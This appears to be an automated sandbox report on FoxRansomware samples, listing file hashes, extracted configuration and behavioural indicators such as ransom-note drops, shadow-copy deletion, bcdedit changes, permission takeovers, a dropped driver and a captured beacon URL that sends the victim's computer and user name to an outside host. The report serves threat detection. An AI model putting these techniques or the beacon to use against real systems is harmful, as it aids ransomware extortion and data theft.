Overview
Static: score 10
Behavioral tasks:
score 3: FoxRansomw...65.exe on windows7-x64
score 10: FoxRansomw...65.exe on windows10-2004-x64
score 10: FoxRansomw...a7.exe on windows7-x64
score 10: FoxRansomw...a7.exe on windows10-2004-x64
score 10: FoxRansomw...20.exe on windows7-x64
score 10: FoxRansomw...20.exe on windows10-2004-x64
score 10: FoxRansomw...0b.exe on windows7-x64
score 10: FoxRansomw...0b.exe on windows10-2004-x64
score 10: FoxRansomw...53.exe on windows7-x64
score 10: FoxRansomw...53.exe on windows10-2004-x64
score 10: FoxRansomw...b1.exe on windows7-x64
score 10: FoxRansomw...b1.exe on windows10-2004-x64
Resubmissions: 10
03-04-2024 17:37 240403-v68g6sga2w, score 10
Analysis
max time kernel: 149s
max time network: 127s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03-04-2024 17:37
Static task: static1
Behavioral task behavioral1: FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, resource win7-20240221-en
Behavioral task behavioral2: FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, resource win10v2004-20240226-en
Behavioral task behavioral3: FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, resource win7-20240221-en
Behavioral task behavioral4: FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, resource win10v2004-20240226-en
Behavioral task behavioral5: FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, resource win7-20240221-en
Behavioral task behavioral6: FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, resource win10v2004-20231215-en
Behavioral task behavioral7: FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, resource win7-20240319-en
Behavioral task behavioral8: FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, resource win10v2004-20240226-en
Behavioral task behavioral9: FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, resource win7-20240221-en
Behavioral task behavioral10: FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, resource win10v2004-20240226-en
Behavioral task behavioral11: FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, resource win7-20240221-en
Behavioral task behavioral12: FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, resource win10v2004-20240226-en
General
Target: FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Size: 1.2MB
MD5: 268360527625d09e747d9f7ab1f84da5
SHA1: 09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA256: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA512: 07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
SSDEEP: 24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted: http://myexternalip.com/raw
Extracted: C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
description ioc Process
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0rowjuc9.default-release\safebrowsing\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jre7\lib\management\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Mahjong\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Local\Adobe\Color\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
HTTP URL 13 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=IZKCKOTP|Admin&sid=bRRtOTgtRY62uG3m&phase=[FIN]7806663DF58A30EA|3811|38|3849 Process not Found
File created C:\Program Files (x86)\Google\Update\1.3.36.151\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jre7\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jre7\lib\zi\Africa\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\plugins\access\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\FreeCell\de-DE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Mahjong\de-DE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jre7\lib\deploy\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files (x86)\Microsoft.NET\RedistList\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\Favorites\Microsoft Websites\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Public\Videos\Sample Videos\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\Videos\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Minesweeper\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Hearts\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Users\Admin\Music\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\Microsoft Games\Chess\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
pid Process
6500 bcdedit.exe
1336 bcdedit.exe

Blocklisted process makes network request (1 IoCs)
flow pid Process
9 2916 powershell.exe

Drops file in Drivers directory (1 IoCs)
description ioc Process
File created C:\Windows\system32\Drivers\PROCEXP152.SYS NDS5iFeg64.exe

Sets service image path in registry (2 TTPs, 1 IoCs)
description ioc Process
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" NDS5iFeg64.exe
Executes dropped EXE (64 IoCs)
pid Process
2612 NWJADauI.exe
1540 NDS5iFeg.exe
5400 NDS5iFeg64.exe
5544 NDS5iFeg.exe
5648 NDS5iFeg.exe
6896 NDS5iFeg.exe
5736 NDS5iFeg.exe
5976 NDS5iFeg.exe
6004 NDS5iFeg.exe
6108 NDS5iFeg.exe
6136 NDS5iFeg.exe
5992 NDS5iFeg.exe
7104 NDS5iFeg.exe
2676 NDS5iFeg.exe
6176 NDS5iFeg.exe
6312 NDS5iFeg.exe
6356 NDS5iFeg.exe
6484 NDS5iFeg.exe
6572 NDS5iFeg.exe
6644 NDS5iFeg.exe
2268 NDS5iFeg.exe
6740 NDS5iFeg.exe
6816 NDS5iFeg.exe
6812 NDS5iFeg.exe
2500 NDS5iFeg.exe
1820 NDS5iFeg.exe
1748 NDS5iFeg.exe
808 NDS5iFeg.exe
1888 NDS5iFeg.exe
652 NDS5iFeg.exe
448 NDS5iFeg.exe
1912 NDS5iFeg.exe
2772 NDS5iFeg.exe
2264 NDS5iFeg.exe
1636 NDS5iFeg.exe
1560 NDS5iFeg.exe
5608 NDS5iFeg.exe
2780 NDS5iFeg.exe
2372 NDS5iFeg.exe
472 NDS5iFeg.exe
1808 NDS5iFeg.exe
1376 NDS5iFeg.exe
2076 NDS5iFeg.exe
2392 NDS5iFeg.exe
2292 NDS5iFeg.exe
2616 NDS5iFeg.exe
2764 NDS5iFeg.exe
2752 NDS5iFeg.exe
2580 NDS5iFeg.exe
3108 NDS5iFeg.exe
3144 NDS5iFeg.exe
3376 NDS5iFeg.exe
3380 NDS5iFeg.exe
3456 NDS5iFeg.exe
3100 NDS5iFeg.exe
3184 NDS5iFeg.exe
3196 NDS5iFeg.exe
3272 NDS5iFeg.exe
3288 NDS5iFeg.exe
3308 NDS5iFeg.exe
1516 NDS5iFeg.exe
3804 NDS5iFeg.exe
3824 NDS5iFeg.exe
3652 NDS5iFeg.exe
Loads dropped DLL (64 IoCs)
pid Process
2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
1172 cmd.exe
1540 NDS5iFeg.exe
5540 cmd.exe
5212 cmd.exe
5716 cmd.exe
5664 cmd.exe
7100 cmd.exe
5908 cmd.exe
6068 cmd.exe
7128 cmd.exe
7116 cmd.exe
2660 cmd.exe
7164 cmd.exe
2464 cmd.exe
6324 cmd.exe
6252 cmd.exe
6476 cmd.exe
6344 cmd.exe
6652 cmd.exe
6540 cmd.exe
6728 cmd.exe
6604 cmd.exe
6836 cmd.exe
6800 cmd.exe
784 cmd.exe
2096 cmd.exe
1612 cmd.exe
1876 cmd.exe
2400 cmd.exe
1476 cmd.exe
1464 cmd.exe
2480 cmd.exe
2868 cmd.exe
1448 cmd.exe
1468 cmd.exe
2360 cmd.exe
2300 cmd.exe
2104 cmd.exe
1908 cmd.exe
1028 cmd.exe
668 cmd.exe
1940 cmd.exe
320 cmd.exe
1596 cmd.exe
1576 cmd.exe
2784 cmd.exe
2460 cmd.exe
2836 cmd.exe
3088 cmd.exe
2572 cmd.exe
3416 cmd.exe
3164 cmd.exe
3084 cmd.exe
3384 cmd.exe
3464 cmd.exe
3132 cmd.exe
3264 cmd.exe
3208 cmd.exe
3316 cmd.exe
3296 cmd.exe
3568 cmd.exe
3556 cmd.exe
Modifies file permissions (1 TTPs, 64 IoCs)
pid Process
6568 takeown.exe
6484 takeown.exe
4372 takeown.exe
3476 takeown.exe
5560 takeown.exe
5416 takeown.exe
3492 takeown.exe
3832 takeown.exe
5588 takeown.exe
7100 takeown.exe
5908 takeown.exe
6304 takeown.exe
4564 takeown.exe
4292 Process not Found
812 Process not Found
3748 Process not Found
4376 takeown.exe
3772 takeown.exe
6684 takeown.exe
6936 takeown.exe
4436 takeown.exe
1420 takeown.exe
6828 takeown.exe
3092 takeown.exe
856 Process not Found
4424 takeown.exe
6964 takeown.exe
6140 takeown.exe
4424 takeown.exe
5408 takeown.exe
5844 takeown.exe
1572 takeown.exe
2988 takeown.exe
816 takeown.exe
4216 takeown.exe
1560 Process not Found
3880 takeown.exe
2320 takeown.exe
4908 takeown.exe
3316 Process not Found
3324 takeown.exe
3988 takeown.exe
6380 takeown.exe
6832 takeown.exe
2696 takeown.exe
5380 takeown.exe
6048 takeown.exe
3156 takeown.exe
5564 takeown.exe
5788 takeown.exe
6064 takeown.exe
2412 Process not Found
2700 takeown.exe
3436 takeown.exe
3512 Process not Found
4548 takeown.exe
1996 takeown.exe
2880 Process not Found
6096 takeown.exe
6520 takeown.exe
3040 takeown.exe
4752 takeown.exe
4952 takeown.exe
6596 takeown.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource yara_rule
behavioral5/files/0x0006000000015d56-2812.dat upx
behavioral5/memory/1540-3785-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/5540-7762-0x0000000000470000-0x00000000004E7000-memory.dmp upx
behavioral5/memory/5544-7764-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/5544-7765-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/5648-7769-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6896-7774-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/5736-7835-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/5976-7841-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6004-7844-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6108-7850-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6136-7853-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/5992-7862-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/7104-7866-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2676-7871-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6176-7875-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6312-7885-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6356-7888-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6484-7895-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6572-7899-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6644-7904-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2268-7908-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6740-7914-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6816-7918-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/6812-7922-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2500-7925-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1820-7936-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1748-7941-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/808-7946-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1888-7948-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1888-7949-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/652-7952-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/448-7953-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1912-7956-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2772-7957-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2264-7960-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1636-7961-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1560-7969-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/5608-7970-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2780-7974-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2780-7975-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2372-7977-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/472-7979-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1808-7980-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1376-7985-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/1376-7986-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2076-7991-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2076-7992-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2392-7993-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2292-7996-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2616-7997-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2764-7999-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2752-8002-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/2580-8003-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3108-8004-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3144-8005-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3376-8008-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3380-8009-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3456-8010-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3100-8013-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3184-8014-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3196-8015-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3272-8016-0x0000000000400000-0x0000000000477000-memory.dmp upx
behavioral5/memory/3288-8017-0x0000000000400000-0x0000000000477000-memory.dmp upx
Drops desktop.ini file(s) (40 IoCs)
description ioc Process
File opened for modification C:\Users\Admin\Searches\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Saved Games\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JWM3U1DD\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Contacts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Favorites\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Recorded TV\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
